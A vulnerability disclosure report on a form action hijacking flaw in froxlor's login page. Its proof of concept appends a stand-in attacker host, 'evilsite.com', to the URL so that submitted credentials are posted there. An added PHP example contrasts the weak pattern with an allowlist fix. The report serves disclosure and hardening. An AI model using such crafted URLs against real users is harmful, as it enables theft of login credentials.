External Control of File Name or Path in froxlor/froxlor

Valid

Reported on Aug 25th 2021


✍️ Description

By modifying the login page URL, the login form's POST request can be hijacked so that the submitted credentials are sent to an external website.

🕵️‍♂️ Proof of Concept

Change the login page URL to

https://mydomain.com/index.php/evilsite.com

Then the form action in the webpage will be changed to

<section class="loginsec">
    <form method="post" action="evilsite.com" enctype="application/x-www-form-urlencoded">
        <input type="hidden" name="script" value="" />
        <input type="hidden" name="qrystr" value="" />

💥 Impact

Form action hijacking vulnerabilities arise when an application places user-supplied input into the action URL of an HTML form. An attacker can use this vulnerability to construct a URL that, if visited by another application user, will modify the action URL of a form to point to the attacker's server. If a user submits the form then its contents, including any input from the victim user, will be delivered directly to the attacker.
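
The pattern described above, shown as an added PHP example (not froxlor's code and not part of the original report). It assumes the form action is derived from the request path, which the report does not state; the function names, the sample `$_SERVER` values and the allowlist are constructed for illustration.

```php
<?php
// Constructed $_SERVER values for a request to /index.php/evilsite.com.
// PHP_SELF carries the trailing PATH_INFO segment; SCRIPT_NAME does not.
$server = [
    'PHP_SELF'    => '/index.php/evilsite.com',
    'SCRIPT_NAME' => '/index.php',
    'PATH_INFO'   => '/evilsite.com',
];

// Weak (assumed pattern): the last segment of PHP_SELF is caller-controlled.
function actionFromPhpSelf(array $server): string
{
    return basename($server['PHP_SELF']);
}

// Hardened: read the script name from SCRIPT_NAME and accept only known
// entry points, falling back to a fixed default for anything else.
function actionFromAllowlist(array $server, array $allowed, string $default = 'index.php'): string
{
    $name = basename($server['SCRIPT_NAME'] ?? '');
    return in_array($name, $allowed, true) ? $name : $default;
}

// Output encoding stays necessary, but it does not fix the weak variant:
// "evilsite.com" contains nothing for htmlspecialchars() to escape.
function renderForm(string $action): string
{
    $safe = htmlspecialchars($action, ENT_QUOTES, 'UTF-8');
    return '<form method="post" action="' . $safe . '">';
}

// Hypothetical allowlist; list the application's real entry scripts here.
$allowed = ['index.php'];

$weak     = actionFromPhpSelf($server);
$hardened = actionFromAllowlist($server, $allowed);

echo renderForm($weak), PHP_EOL;      // action follows the URL suffix
echo renderForm($hardened), PHP_EOL;  // action stays index.php

// Regression check: the URL suffix must never reach the form action.
if ($weak !== 'evilsite.com' || $hardened !== 'index.php') {
    throw new RuntimeException('unexpected form action');
}
```

The same check can run in a test suite against the rendered login page: request the page with an extra path segment appended and assert that the `action` attribute is unchanged.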

Occurrences

We have contacted a member of the froxlor team and are waiting to hear back (2 years ago)
froxlor/froxlor maintainer marked this as fixed with commit 5d375b (2 years ago)
The fix bounty has been dropped
This vulnerability will not receive a CVE